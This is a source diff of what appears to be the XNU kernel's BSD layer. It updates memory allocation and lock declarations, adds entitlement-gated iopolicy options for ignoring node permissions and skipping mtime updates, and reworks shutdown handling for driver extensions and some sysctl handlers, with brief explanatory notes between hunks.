index b3470216aefda293a309c0a2843dfb57e2c62e66..31561cf428b46c507e78da98969a8ddf38ee9b88 100644 (file)
@@ -998,8 +998,7 @@ persona_proc_adopt(proc_t p, struct persona *persona, kauth_cred_t auth_override
 
        /* Only Multiuser Mode needs to update the session login name to the persona name */
 #if (TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
-       volatile uint32_t *multiuser_flag_address = (volatile uint32_t *)(uintptr_t)(_COMM_PAGE_MULTIUSER_CONFIG);
-       uint32_t multiuser_flags = *multiuser_flag_address;
+       uint32_t multiuser_flags = COMM_PAGE_READ(uint32_t, MULTIUSER_CONFIG);
        /* set the login name of the session */
        if (multiuser_flags) {
                struct session * sessp = proc_session(p);
index 21fa06635fae32a7cfa5bb4a8d5465d302f3e5a3..163122f54158427f6d989471f3ff4bf2dab4aac9 100644 (file)
@@ -190,10 +190,17 @@ __XNU_PRIVATE_EXTERN char corefilename[MAXPATHLEN + 1] = {"/private/var/cores/%N
 #include <kern/backtrace.h>
 #endif
 
+static LCK_MTX_DECLARE_ATTR(proc_klist_mlock, &proc_mlock_grp, &proc_lck_attr);
+
 ZONE_DECLARE(pgrp_zone, "pgrp",
     sizeof(struct pgrp), ZC_ZFREE_CLEARMEM);
 ZONE_DECLARE(session_zone, "session",
     sizeof(struct session), ZC_ZFREE_CLEARMEM);
+/*
+ * If you need accounting for KM_PROC consider using
+ * ZONE_VIEW_DEFINE to define a zone view.
+ */
+#define KM_PROC KHEAP_DEFAULT
 
 typedef uint64_t unaligned_u64 __attribute__((aligned(1)));
 
@@ -282,7 +289,7 @@ again:
                LIST_REMOVE(uip, ui_hash);
                retval = 0;
                proc_list_unlock();
-               FREE(uip, M_PROC);
+               kheap_free(KM_PROC, uip, sizeof(struct uidinfo));
                goto out;
        }
        if (diff <= 0) {
@@ -304,15 +311,13 @@ again:
                goto out;
        }
        proc_list_unlock();
-       MALLOC(newuip, struct uidinfo *, sizeof(*uip), M_PROC, M_WAITOK);
+       newuip = kheap_alloc(KM_PROC, sizeof(struct uidinfo), Z_WAITOK);
        if (newuip == NULL) {
                panic("chgproccnt: M_PROC zone depleted");
        }
        goto again;
 out:
-       if (newuip != NULL) {
-               FREE(newuip, M_PROC);
-       }
+       kheap_free(KM_PROC, newuip, sizeof(struct uidinfo));
        return retval;
 }
 
@@ -596,7 +601,7 @@ retry:
            (((p->p_listflag & (P_LIST_DRAIN | P_LIST_DRAINWAIT)) == 0) ||
            ((p->p_listflag & P_LIST_REFWAIT) != 0))) {
                if ((p->p_listflag & P_LIST_REFWAIT) != 0 && uthread_needs_to_wait_in_proc_refwait()) {
-                       msleep(&p->p_listflag, proc_list_mlock, 0, "proc_refwait", 0);
+                       msleep(&p->p_listflag, &proc_list_mlock, 0, "proc_refwait", 0);
                        /*
                         * the proc might have been recycled since we dropped
                         * the proc list lock, get the proc again.
@@ -648,7 +653,7 @@ again:
 
        /* If someone else is controlling the (unreaped) zombie - wait */
        if ((p->p_listflag & P_LIST_WAITING) != 0) {
-               (void)msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0);
+               (void)msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0);
                goto again;
        }
        p->p_listflag |=  P_LIST_WAITING;
@@ -699,7 +704,7 @@ proc_refdrain_with_refwait(proc_t p, boolean_t get_ref_and_allow_wait)
        /* Do not wait in ref drain for launchd exec */
        while (p->p_refcount && !initexec) {
                p->p_listflag |= P_LIST_DRAINWAIT;
-               msleep(&p->p_refcount, proc_list_mlock, 0, "proc_refdrain", 0);
+               msleep(&p->p_refcount, &proc_list_mlock, 0, "proc_refdrain", 0);
        }
 
        p->p_listflag &= ~P_LIST_DRAIN;
@@ -746,7 +751,7 @@ loop:
 
        if ((pp->p_listflag & (P_LIST_CHILDDRSTART | P_LIST_CHILDDRAINED)) == P_LIST_CHILDDRSTART) {
                pp->p_listflag |= P_LIST_CHILDDRWAIT;
-               msleep(&pp->p_childrencnt, proc_list_mlock, 0, "proc_parent", 0);
+               msleep(&pp->p_childrencnt, &proc_list_mlock, 0, "proc_parent", 0);
                loopcnt++;
                if (loopcnt == 5) {
                        parent = PROC_NULL;
@@ -800,7 +805,7 @@ proc_childdrainstart(proc_t p)
        /* wait for all that hold parentrefs to drop */
        while (p->p_parentref > 0) {
                p->p_listflag |= P_LIST_PARENTREFWAIT;
-               msleep(&p->p_parentref, proc_list_mlock, 0, "proc_childdrainstart", 0);
+               msleep(&p->p_parentref, &proc_list_mlock, 0, "proc_childdrainstart", 0);
        }
 }
 
@@ -857,6 +862,7 @@ int
 proc_pid(proc_t p)
 {
        if (p != NULL) {
+               proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC);
                return p->p_pid;
        }
        return -1;
@@ -866,6 +872,7 @@ int
 proc_ppid(proc_t p)
 {
        if (p != NULL) {
+               proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC);
                return p->p_ppid;
        }
        return -1;
@@ -875,6 +882,7 @@ int
 proc_original_ppid(proc_t p)
 {
        if (p != NULL) {
+               proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC);
                return p->p_original_ppid;
        }
        return -1;
@@ -913,6 +921,7 @@ int
 proc_csflags(proc_t p, uint64_t *flags)
 {
        if (p && flags) {
+               proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC);
                *flags = (uint64_t)p->p_csflags;
                return 0;
        }
@@ -996,7 +1005,7 @@ loop:
        parent =  proc_ref_locked(pp);
        if ((parent == PROC_NULL) && (pp != PROC_NULL) && (pp->p_stat != SZOMB) && ((pp->p_listflag & P_LIST_EXITED) != 0) && ((pp->p_listflag & P_LIST_CHILDDRAINED) == 0)) {
                pp->p_listflag |= P_LIST_CHILDLKWAIT;
-               msleep(&pp->p_childrencnt, proc_list_mlock, 0, "proc_parent", 0);
+               msleep(&pp->p_childrencnt, &proc_list_mlock, 0, "proc_parent", 0);
                goto loop;
        }
        proc_list_unlock();
@@ -1745,7 +1754,7 @@ enterpgrp(proc_t p, pid_t pgid, int mksess)
                        sess->s_count = 1;
                        sess->s_ttypgrpid = NO_PID;
 
-                       lck_mtx_init(&sess->s_mlock, proc_mlock_grp, proc_lck_attr);
+                       lck_mtx_init(&sess->s_mlock, &proc_mlock_grp, &proc_lck_attr);
 
                        bcopy(procsp->s_login, sess->s_login,
                            sizeof(sess->s_login));
@@ -1773,7 +1782,7 @@ enterpgrp(proc_t p, pid_t pgid, int mksess)
                }
                pgrp->pg_id = pgid;
 
-               lck_mtx_init(&pgrp->pg_mlock, proc_mlock_grp, proc_lck_attr);
+               lck_mtx_init(&pgrp->pg_mlock, &proc_mlock_grp, &proc_lck_attr);
 
                LIST_INIT(&pgrp->pg_members);
                proc_list_lock();
@@ -1897,13 +1906,13 @@ pgdelete_dropref(struct pgrp *pgrp)
                        panic("pg_deleteref: freeing session in use");
                }
                proc_list_unlock();
-               lck_mtx_destroy(&sessp->s_mlock, proc_mlock_grp);
+               lck_mtx_destroy(&sessp->s_mlock, &proc_mlock_grp);
 
                zfree(session_zone, sessp);
        } else {
                proc_list_unlock();
        }
-       lck_mtx_destroy(&pgrp->pg_mlock, proc_mlock_grp);
+       lck_mtx_destroy(&pgrp->pg_mlock, &proc_mlock_grp);
        zfree(pgrp_zone, pgrp);
 }
 
@@ -2232,6 +2241,18 @@ proc_ignores_content_protection(proc_t p)
        return os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION;
 }
 
+bool
+proc_ignores_node_permissions(proc_t p)
+{
+       return os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS;
+}
+
+bool
+proc_skip_mtime_update(proc_t p)
+{
+       return os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_SKIP_MTIME_UPDATE;
+}
+
 #if CONFIG_COREDUMP
 /*
  * proc_core_name(name, uid, pid)
@@ -2764,7 +2785,7 @@ proc_iterate(
                proc_list_lock();
                pid_count_available = nprocs + 1; /* kernel_task not counted in nprocs */
                assert(pid_count_available > 0);
-               if (pidlist_nalloc(pl) > pid_count_available) {
+               if (pidlist_nalloc(pl) >= pid_count_available) {
                        break;
                }
                proc_list_unlock();
@@ -2927,7 +2948,7 @@ proc_childrenwalk(
                        proc_list_unlock();
                        goto out;
                }
-               if (pidlist_nalloc(pl) > pid_count_available) {
+               if (pidlist_nalloc(pl) >= pid_count_available) {
                        break;
                }
                proc_list_unlock();
@@ -3008,7 +3029,7 @@ pgrp_iterate(
                        }
                        goto out;
                }
-               if (pidlist_nalloc(pl) > pid_count_available) {
+               if (pidlist_nalloc(pl) >= pid_count_available) {
                        break;
                }
                pgrp_unlock(pgrp);
@@ -3166,7 +3187,7 @@ pgrp_replace(struct proc * p, struct pgrp * newpg)
 
        while ((p->p_listflag & P_LIST_PGRPTRANS) == P_LIST_PGRPTRANS) {
                p->p_listflag |= P_LIST_PGRPTRWAIT;
-               (void)msleep(&p->p_pgrpid, proc_list_mlock, 0, "proc_pgrp", 0);
+               (void)msleep(&p->p_pgrpid, &proc_list_mlock, 0, "proc_pgrp", 0);
        }
 
        p->p_listflag |= P_LIST_PGRPTRANS;
@@ -3276,7 +3297,7 @@ proc_pgrp(proc_t p)
 
        while ((p->p_listflag & P_LIST_PGRPTRANS) == P_LIST_PGRPTRANS) {
                p->p_listflag |= P_LIST_PGRPTRWAIT;
-               (void)msleep(&p->p_pgrpid, proc_list_mlock, 0, "proc_pgrp", 0);
+               (void)msleep(&p->p_pgrpid, &proc_list_mlock, 0, "proc_pgrp", 0);
        }
 
        pgrp = p->p_pgrp;
@@ -3328,7 +3349,7 @@ proc_session(proc_t p)
        /* wait during transitions */
        while ((p->p_listflag & P_LIST_PGRPTRANS) == P_LIST_PGRPTRANS) {
                p->p_listflag |= P_LIST_PGRPTRWAIT;
-               (void)msleep(&p->p_pgrpid, proc_list_mlock, 0, "proc_pgrp", 0);
+               (void)msleep(&p->p_pgrpid, &proc_list_mlock, 0, "proc_pgrp", 0);
        }
 
        if ((p->p_pgrp != PGRP_NULL) && ((sess = p->p_pgrp->pg_session) != SESSION_NULL)) {
@@ -3356,7 +3377,7 @@ session_rele(struct session *sess)
                        panic("session_rele: freeing session in use");
                }
                proc_list_unlock();
-               lck_mtx_destroy(&sess->s_mlock, proc_mlock_grp);
+               lck_mtx_destroy(&sess->s_mlock, &proc_mlock_grp);
                zfree(session_zone, sess);
        } else {
                proc_list_unlock();
@@ -3451,13 +3472,13 @@ proc_transwait(proc_t p, int locked)
 void
 proc_klist_lock(void)
 {
-       lck_mtx_lock(proc_klist_mlock);
+       lck_mtx_lock(&proc_klist_mlock);
 }
 
 void
 proc_klist_unlock(void)
 {
-       lck_mtx_unlock(proc_klist_mlock);
+       lck_mtx_unlock(&proc_klist_mlock);
 }
 
 void
index d689b70d57533a8fb2aa594c69b82f37823c3fef..6a0b8edeed5689a2d3aa0ac955ecd84b6fed6d7c 100644 (file)
  * result.
  *
  * Note:       Does *NOT* currently include per-thread credential changes
- *
- *             We don't use kauth_cred_print() in current debugging, but it
- *             can be used if needed when debugging is active.
  */
 #if DEBUG_CRED
 #define DEBUG_CRED_ENTER                printf
 #define DEBUG_CRED_CHANGE               printf
-extern void kauth_cred_print(kauth_cred_t cred);
 #else   /* !DEBUG_CRED */
 #define DEBUG_CRED_ENTER(fmt, ...)      do {} while (0)
 #define DEBUG_CRED_CHANGE(fmt, ...)     do {} while (0)
index 6628465844c776d221c0503849a770705f7332d6..65c6d020ccb15afd8532fc69588f3c865b2a70c8 100644 (file)
@@ -1614,6 +1614,10 @@ static int
 iopolicysys_vfs_trigger_resolve(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *iop_param);
 static int
 iopolicysys_vfs_ignore_content_protection(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *iop_param);
+static int
+iopolicysys_vfs_ignore_node_permissions(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *ipo_param);
+static int
+iopolicysys_vfs_skip_mtime_update(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *iop_param);
 
 /*
  * iopolicysys
@@ -1684,6 +1688,18 @@ iopolicysys(struct proc *p, struct iopolicysys_args *uap, int32_t *retval)
                        goto out;
                }
                break;
+       case IOPOL_TYPE_VFS_IGNORE_PERMISSIONS:
+               error = iopolicysys_vfs_ignore_node_permissions(p, uap->cmd, iop_param.iop_scope, iop_param.iop_policy, &iop_param);
+               if (error) {
+                       goto out;
+               }
+               break;
+       case IOPOL_TYPE_VFS_SKIP_MTIME_UPDATE:
+               error = iopolicysys_vfs_skip_mtime_update(p, uap->cmd, iop_param.iop_scope, iop_param.iop_policy, &iop_param);
+               if (error) {
+                       goto out;
+               }
+               break;
        default:
                error = EINVAL;
                goto out;
@@ -2289,6 +2305,104 @@ out:
        return error;
 }
 
+#define AUTHORIZED_ACCESS_ENTITLEMENT \
+       "com.apple.private.vfs.authorized-access"
+int
+iopolicysys_vfs_ignore_node_permissions(struct proc *p, int cmd, int scope,
+    int policy, __unused struct _iopol_param_t *iop_param)
+{
+       int error = EINVAL;
+
+       switch (scope) {
+       case IOPOL_SCOPE_PROCESS:
+               break;
+       default:
+               goto out;
+       }
+
+       switch (cmd) {
+       case IOPOL_CMD_GET:
+               policy = os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS ?
+                   IOPOL_VFS_IGNORE_PERMISSIONS_ON : IOPOL_VFS_IGNORE_PERMISSIONS_OFF;
+               iop_param->iop_policy = policy;
+               goto out_ok;
+       case IOPOL_CMD_SET:
+               /* SET is handled after the switch */
+               break;
+       default:
+               goto out;
+       }
+
+       if (!IOTaskHasEntitlement(current_task(), AUTHORIZED_ACCESS_ENTITLEMENT)) {
+               error = EPERM;
+               goto out;
+       }
+
+       switch (policy) {
+       case IOPOL_VFS_IGNORE_PERMISSIONS_OFF:
+               os_atomic_andnot(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS, relaxed);
+               break;
+       case IOPOL_VFS_IGNORE_PERMISSIONS_ON:
+               os_atomic_or(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS, relaxed);
+               break;
+       default:
+               break;
+       }
+
+out_ok:
+       error = 0;
+out:
+       return error;
+}
+
+#define SKIP_MTIME_UPDATE_ENTITLEMENT \
+       "com.apple.private.vfs.skip-mtime-updates"
+int
+iopolicysys_vfs_skip_mtime_update(struct proc *p, int cmd, int scope,
+    int policy, __unused struct _iopol_param_t *iop_param)
+{
+       int error = EINVAL;
+
+       switch (scope) {
+       case IOPOL_SCOPE_PROCESS:
+               break;
+       default:
+               goto out;
+       }
+
+       switch (cmd) {
+       case IOPOL_CMD_GET:
+               policy = os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_SKIP_MTIME_UPDATE ?
+                   IOPOL_VFS_SKIP_MTIME_UPDATE_ON : IOPOL_VFS_SKIP_MTIME_UPDATE_OFF;
+               iop_param->iop_policy = policy;
+               goto out_ok;
+       case IOPOL_CMD_SET:
+               break;
+       default:
+               break;
+       }
+
+       if (!IOTaskHasEntitlement(current_task(), SKIP_MTIME_UPDATE_ENTITLEMENT)) {
+               error = EPERM;
+               goto out;
+       }
+
+       switch (policy) {
+       case IOPOL_VFS_SKIP_MTIME_UPDATE_OFF:
+               os_atomic_andnot(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_SKIP_MTIME_UPDATE, relaxed);
+               break;
+       case IOPOL_VFS_SKIP_MTIME_UPDATE_ON:
+               os_atomic_or(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_SKIP_MTIME_UPDATE, relaxed);
+               break;
+       default:
+               break;
+       }
+
+out_ok:
+       error = 0;
+out:
+       return error;
+}
 /* BSD call back function for task_policy networking changes */
 void
 proc_apply_task_networkbg(void * bsd_info, thread_t thread)
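Both new policies are per-process opt-ins gated by private entitlements. From user space they would be toggled through the existing iopolicy interface; a hypothetical caller sketch, assuming the process carries the corresponding entitlement:

#include <sys/resource.h>
#include <stdio.h>

int
main(void)
{
        if (setiopolicy_np(IOPOL_TYPE_VFS_SKIP_MTIME_UPDATE,
            IOPOL_SCOPE_PROCESS, IOPOL_VFS_SKIP_MTIME_UPDATE_ON) != 0) {
                perror("setiopolicy_np");   /* EPERM without the entitlement */
                return 1;
        }
        /* Subsequent writes by this process skip mtime updates. */
        return 0;
}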
index 3bd774db5e2dbc530ba01bd8ae1d0cdc8938f1e3..e723f89a26af56dc60c7936586a3407bd0cfd911 100644 (file)
@@ -67,6 +67,7 @@
 #include <kern/clock.h>                 /* for delay_for_interval() */
 #include <libkern/OSAtomic.h>
 #include <IOKit/IOPlatformExpert.h>
+#include <IOKit/IOMessage.h>
 
 #include <sys/kdebug.h>
 
@@ -82,7 +83,7 @@ unsigned int proc_shutdown_exitcount = 0;
 static int  sd_openlog(vfs_context_t);
 static int  sd_closelog(vfs_context_t);
 static void sd_log(vfs_context_t, const char *, ...);
-static void proc_shutdown(void);
+static void proc_shutdown(int only_non_dext);
 static void zprint_panic_info(void);
 extern void halt_log_enter(const char * what, const void * pc, uint64_t time);
 
@@ -93,6 +94,7 @@ extern boolean_t kdp_has_polled_corefile(void);
 struct sd_filterargs {
        int delayterm;
        int shutdownstate;
+       int only_non_dext;
 };
 
 
@@ -113,7 +115,7 @@ static int sd_callback1(proc_t p, void * arg);
 static int sd_callback2(proc_t p, void * arg);
 static int sd_callback3(proc_t p, void * arg);
 
-extern boolean_t panic_include_zprint;
+extern bool panic_include_zprint;
 extern mach_memory_info_t *panic_kext_memory_info;
 extern vm_size_t panic_kext_memory_size;
 
@@ -217,7 +219,7 @@ reboot_kernel(int howto, char *message)
                /* handle live procs (deallocate their root and current directories), suspend initproc */
 
                startTime = mach_absolute_time();
-               proc_shutdown();
+               proc_shutdown(TRUE);
                halt_log_enter("proc_shutdown", 0, mach_absolute_time() - startTime);
 
 #if CONFIG_AUDIT
@@ -252,10 +254,27 @@ reboot_kernel(int howto, char *message)
 #endif /* DEVELOPMENT || DEBUG */
                {
                        startTime = mach_absolute_time();
-                       vfs_unmountall();
+                       vfs_unmountall(TRUE);
                        halt_log_enter("vfs_unmountall", 0, mach_absolute_time() - startTime);
                }
 
+               IOSystemShutdownNotification(kIOSystemShutdownNotificationTerminateDEXTs);
+
+               startTime = mach_absolute_time();
+               proc_shutdown(FALSE);
+               halt_log_enter("proc_shutdown", 0, mach_absolute_time() - startTime);
+
+#if DEVELOPMENT || DEBUG
+               if (!(howto & RB_PANIC) || !kdp_has_polled_corefile())
+#endif /* DEVELOPMENT || DEBUG */
+               {
+                       startTime = mach_absolute_time();
+                       vfs_unmountall(FALSE);
+                       halt_log_enter("vfs_unmountall", 0, mach_absolute_time() - startTime);
+               }
+
+
+
                /* Wait for the buffer cache to clean remaining dirty buffers */
                startTime = mach_absolute_time();
                for (iter = 0; iter < 100; iter++) {
@@ -334,6 +353,7 @@ sd_closelog(vfs_context_t ctx)
        if (sd_logvp != NULLVP) {
                VNOP_FSYNC(sd_logvp, MNT_WAIT, ctx);
                error = vnode_close(sd_logvp, FWRITE, ctx);
+               sd_logvp = NULLVP;
        }
 
        return error;
@@ -365,6 +385,8 @@ sd_log(vfs_context_t ctx, const char *fmt, ...)
        va_end(arglist);
 }
 
+#define proc_is_driver(p) (task_is_driver((p)->task))
+
 static int
 sd_filt1(proc_t p, void * args)
 {
@@ -373,6 +395,10 @@ sd_filt1(proc_t p, void * args)
        int delayterm = sf->delayterm;
        int shutdownstate = sf->shutdownstate;
 
+       if (sf->only_non_dext && proc_is_driver(p)) {
+               return 0;
+       }
+
        if (((p->p_flag & P_SYSTEM) != 0) || (p->p_ppid == 0)
            || (p == self) || (p->p_stat == SZOMB)
            || (p->p_shutdownstate != shutdownstate)
@@ -403,7 +429,9 @@ sd_callback1(proc_t p, void * args)
                        proc_shutdown_exitcount++;
                        proc_list_unlock();
                }
-
+               if (proc_is_driver(p)) {
+                       printf("lingering dext %s signal(%d)\n", p->p_name, signo);
+               }
                psignal(p, signo);
                if (countproc != 0) {
                        sd->activecount++;
@@ -423,6 +451,10 @@ sd_filt2(proc_t p, void * args)
        int delayterm = sf->delayterm;
        int shutdownstate = sf->shutdownstate;
 
+       if (sf->only_non_dext && proc_is_driver(p)) {
+               return 0;
+       }
+
        if (((p->p_flag & P_SYSTEM) != 0) || (p->p_ppid == 0)
            || (p == self) || (p->p_stat == SZOMB)
            || (p->p_shutdownstate == shutdownstate)
@@ -451,6 +483,9 @@ sd_callback2(proc_t p, void * args)
                        proc_shutdown_exitcount++;
                        proc_list_unlock();
                }
+               if (proc_is_driver(p)) {
+                       printf("lingering dext %s signal(%d)\n", p->p_name, signo);
+               }
                psignal(p, signo);
                if (countproc != 0) {
                        sd->activecount++;
@@ -517,7 +552,7 @@ sd_callback3(proc_t p, void * args)
  */
 
 static void
-proc_shutdown(void)
+proc_shutdown(int only_non_dext)
 {
        vfs_context_t ctx = vfs_context_current();
        struct proc *p, *self;
@@ -550,6 +585,7 @@ sigterm_loop:
         */
        sfargs.delayterm = delayterm;
        sfargs.shutdownstate = 0;
+       sfargs.only_non_dext = only_non_dext;
        sdargs.signo = SIGTERM;
        sdargs.setsdstate = 1;
        sdargs.countproc = 1;
@@ -569,7 +605,7 @@ sigterm_loop:
                         */
                        ts.tv_sec = 3;
                        ts.tv_nsec = 0;
-                       error = msleep(&proc_shutdown_exitcount, proc_list_mlock, PWAIT, "shutdownwait", &ts);
+                       error = msleep(&proc_shutdown_exitcount, &proc_list_mlock, PWAIT, "shutdownwait", &ts);
                        if (error != 0) {
                                for (p = allproc.lh_first; p; p = p->p_list.le_next) {
                                        if ((p->p_listflag & P_LIST_EXITCOUNT) == P_LIST_EXITCOUNT) {
@@ -628,7 +664,7 @@ sigterm_loop:
                         */
                        ts.tv_sec = 10;
                        ts.tv_nsec = 0;
-                       error = msleep(&proc_shutdown_exitcount, proc_list_mlock, PWAIT, "shutdownwait", &ts);
+                       error = msleep(&proc_shutdown_exitcount, &proc_list_mlock, PWAIT, "shutdownwait", &ts);
                        if (error != 0) {
                                for (p = allproc.lh_first; p; p = p->p_list.le_next) {
                                        if ((p->p_listflag & P_LIST_EXITCOUNT) == P_LIST_EXITCOUNT) {
@@ -686,6 +722,10 @@ sigterm_loop:
 
        sd_closelog(ctx);
 
+       if (only_non_dext) {
+               return;
+       }
+
        /*
         * Now that all other processes have been terminated, suspend init
         */
index 3c9cb1feeafde64a6ff73d80d613ef57a0cc6543..74ecaf33814a9b23939dc2c5f31db2fe04b8ed97 100644 (file)
@@ -3252,7 +3252,6 @@ postsig_locked(int signum)
                 * Default catcher, where the default is to kill
                 * the process.  (Other cases were ignored above.)
                 */
-               sig_lock_to_exit(p);
 
                /*
                 * exit_with_reason() below will consume a reference to the thread's exit reason, so we take another
index 4c07b8ce950038c37d25877db5aeb37e2f323562..1534078992e2d20822aab187c6152c4be4e67a2b 100644 (file)
 #include <sys/memory_maintenance.h>
 #include <sys/priv.h>
 #include <stdatomic.h>
+#include <uuid/uuid.h>
 
 #include <security/audit/audit.h>
 #include <kern/kalloc.h>
@@ -189,6 +190,7 @@ extern unsigned int speculative_prefetch_max_iosize;
 extern unsigned int preheat_max_bytes;
 extern unsigned int preheat_min_bytes;
 extern long numvnodes;
+extern long freevnodes;
 extern long num_recycledvnodes;
 
 extern uuid_string_t bootsessionuuid_string;
@@ -449,6 +451,7 @@ sysctl_sched_stats(__unused struct sysctl_oid *oidp, __unused void *arg1, __unus
        host_basic_info_data_t hinfo;
        kern_return_t kret;
        uint32_t size;
+       uint32_t buf_size = 0;
        int changed;
        mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT;
        struct _processor_statistics_np *buf;
@@ -465,7 +468,8 @@ sysctl_sched_stats(__unused struct sysctl_oid *oidp, __unused void *arg1, __unus
                return EINVAL;
        }
 
-       MALLOC(buf, struct _processor_statistics_np*, size, M_TEMP, M_ZERO | M_WAITOK);
+       buf_size = size;
+       buf = kheap_alloc(KHEAP_TEMP, buf_size, Z_ZERO | Z_WAITOK);
 
        kret = get_sched_statistics(buf, &size);
        if (kret != KERN_SUCCESS) {
@@ -482,7 +486,7 @@ sysctl_sched_stats(__unused struct sysctl_oid *oidp, __unused void *arg1, __unus
                panic("Sched info changed?!");
        }
 out:
-       FREE(buf, M_TEMP);
+       kheap_free(KHEAP_TEMP, buf, buf_size);
        return error;
 }
 
@@ -531,11 +535,7 @@ sysctl_docountsyscalls SYSCTL_HANDLER_ARGS
        __unused int cmd = oidp->oid_arg2;      /* subcommand*/
        __unused int *name = arg1;      /* oid element argument vector */
        __unused int namelen = arg2;    /* number of oid element arguments */
-       user_addr_t oldp = req->oldptr; /* user buffer copy out address */
-       size_t *oldlenp = &req->oldlen; /* user buffer copy out size */
-       user_addr_t newp = req->newptr; /* user buffer copy in address */
-       size_t newlen = req->newlen;    /* user buffer copy in size */
-       int error;
+       int error, changed;
 
        int tmp;
 
@@ -547,16 +547,17 @@ sysctl_docountsyscalls SYSCTL_HANDLER_ARGS
         * for example, to dump current counts:
         *              sysctl -w kern.count_calls=2
         */
-       error = sysctl_int(oldp, oldlenp, newp, newlen, &tmp);
-       if (error != 0) {
+       error = sysctl_io_number(req, do_count_syscalls,
+           sizeof(do_count_syscalls), &tmp, &changed);
+
+       if (error != 0 || !changed) {
                return error;
        }
 
        if (tmp == 1) {
                do_count_syscalls = 1;
        } else if (tmp == 0 || tmp == 2 || tmp == 3) {
-               int                     i;
-               for (i = 0; i < nsysent; i++) {
+               for (int i = 0; i < nsysent; i++) {
                        if (syscalls_log[i] != 0) {
                                if (tmp == 2) {
                                        printf("%d calls - name %s \n", syscalls_log[i], syscallnames[i]);
@@ -565,14 +566,7 @@ sysctl_docountsyscalls SYSCTL_HANDLER_ARGS
                                }
                        }
                }
-               if (tmp != 0) {
-                       do_count_syscalls = 1;
-               }
-       }
-
-       /* adjust index so we return the right required/consumed amount */
-       if (!error) {
-               req->oldidx += req->oldlen;
+               do_count_syscalls = (tmp != 0);
        }
 
        return error;
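sysctl_io_number() takes over the copy-in/copy-out and index bookkeeping that the removed sysctl_int()/sysctl_quad() helpers and the manual req->oldidx adjustment used to do. A minimal handler sketch using the same call (kernel-side; the variable and handler names are assumptions):

static int example_value;

STATIC int
sysctl_example SYSCTL_HANDLER_ARGS
{
#pragma unused(oidp, arg1, arg2)
        int value = example_value, changed = 0;
        int error;

        error = sysctl_io_number(req, value, sizeof(value), &value, &changed);
        if (error == 0 && changed) {
                example_value = value;
        }
        return error;
}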
@@ -595,65 +589,6 @@ SYSCTL_PROC(_kern, KERN_COUNT_SYSCALLS, count_syscalls, CTLTYPE_NODE | CTLFLAG_R
  * instead.
  */
 
-/*
- * Validate parameters and get old / set new parameters
- * for an integer-valued sysctl function.
- */
-int
-sysctl_int(user_addr_t oldp, size_t *oldlenp,
-    user_addr_t newp, size_t newlen, int *valp)
-{
-       int error = 0;
-
-       if (oldp != USER_ADDR_NULL && oldlenp == NULL) {
-               return EFAULT;
-       }
-       if (oldp && *oldlenp < sizeof(int)) {
-               return ENOMEM;
-       }
-       if (newp && newlen != sizeof(int)) {
-               return EINVAL;
-       }
-       *oldlenp = sizeof(int);
-       if (oldp) {
-               error = copyout(valp, oldp, sizeof(int));
-       }
-       if (error == 0 && newp) {
-               error = copyin(newp, valp, sizeof(int));
-               AUDIT_ARG(value32, *valp);
-       }
-       return error;
-}
-
-/*
- * Validate parameters and get old / set new parameters
- * for an quad(64bit)-valued sysctl function.
- */
-int
-sysctl_quad(user_addr_t oldp, size_t *oldlenp,
-    user_addr_t newp, size_t newlen, quad_t *valp)
-{
-       int error = 0;
-
-       if (oldp != USER_ADDR_NULL && oldlenp == NULL) {
-               return EFAULT;
-       }
-       if (oldp && *oldlenp < sizeof(quad_t)) {
-               return ENOMEM;
-       }
-       if (newp && newlen != sizeof(quad_t)) {
-               return EINVAL;
-       }
-       *oldlenp = sizeof(quad_t);
-       if (oldp) {
-               error = copyout(valp, oldp, sizeof(quad_t));
-       }
-       if (error == 0 && newp) {
-               error = copyin(newp, valp, sizeof(quad_t));
-       }
-       return error;
-}
-
 STATIC int
 sysdoproc_filt_KERN_PROC_PID(proc_t p, void * arg)
 {
@@ -2290,6 +2225,9 @@ SYSCTL_INT(_kern, OID_AUTO, num_taskthreads,
 SYSCTL_LONG(_kern, OID_AUTO, num_recycledvnodes,
     CTLFLAG_RD | CTLFLAG_LOCKED,
     &num_recycledvnodes, "");
+SYSCTL_COMPAT_INT(_kern, OID_AUTO, free_vnodes,
+    CTLFLAG_RD | CTLFLAG_LOCKED,
+    &freevnodes, 0, "");
 
 STATIC int
 sysctl_maxvnodes(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req)
@@ -3434,8 +3372,9 @@ SYSCTL_PROC(_debug,
 #include <mach/task.h>
 #include <mach/semaphore.h>
 
-extern lck_grp_t * sysctl_debug_test_stackshot_owner_grp; /* used for both mutexes and rwlocks */
-extern lck_mtx_t * sysctl_debug_test_stackshot_owner_init_mtx; /* used to protect lck_*_init */
+static LCK_GRP_DECLARE(sysctl_debug_test_stackshot_owner_grp, "test-stackshot-owner-grp");
+static LCK_MTX_DECLARE(sysctl_debug_test_stackshot_owner_init_mtx,
+    &sysctl_debug_test_stackshot_owner_grp);
 
 /* This is a sysctl for testing collection of owner info on a lock in kernel space. A multi-threaded
  * test from userland sets this sysctl in such a way that a thread blocks in kernel mode, and a
